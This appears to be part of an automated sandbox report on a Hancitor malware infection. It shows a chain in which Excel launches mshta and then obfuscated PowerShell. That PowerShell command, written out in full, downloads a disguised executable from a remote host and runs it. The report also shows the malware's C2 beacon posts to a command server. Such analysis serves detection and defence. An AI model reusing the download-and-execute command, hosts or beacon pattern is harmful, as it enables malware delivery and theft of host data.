                                                                                                                                                  7192.168.2.34976177.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:55.212100029 CEST6031OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:55.280215025 CEST6031INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:56 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 42 48 53 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cBHSYARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  8192.168.2.34976277.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:55.649635077 CEST6032OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:55.718817949 CEST6032INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:57 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 48 47 54 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cHGTSARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  9192.168.2.34976377.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:56.101624966 CEST6033OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:56.167244911 CEST6033INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:57 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cKMNPARRABw==0


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  Analysis Process: EXCEL.EXE PID: 6120 Parent PID: 5616

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:07
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
                                                                                                                                                  Imagebase:0xb0000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: mshta.exe PID: 5756 Parent PID: 6120

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:10
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                  Imagebase:0xc10000
                                                                                                                                                  File size:13312 bytes
                                                                                                                                                  MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.224221003.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.225049085.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  Analysis Process: powershell.exe PID: 5944 Parent PID: 5756

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:11
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
                                                                                                                                                  Imagebase:0xe50000
                                                                                                                                                  File size:430592 bytes
                                                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000003.262530252.0000000007E07000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: conhost.exe PID: 3412 Parent PID: 5944

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:12
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: powershell.exe PID: 5788 Parent PID: 5944

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:31
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
                                                                                                                                                  Imagebase:0xe50000
                                                                                                                                                  File size:430592 bytes
                                                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: snd32sys.exe PID: 2160 Parent PID: 5944

                                                                                                                                                  General

                                                                                                                                                  Start time:16:31:07
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Users\Public\snd32sys.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\Public\snd32sys.exe'
                                                                                                                                                  Imagebase:0x610000
                                                                                                                                                  File size:763392 bytes
                                                                                                                                                  MD5 hash:ED1921467F6784AF6BDCA40A06A541B5
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >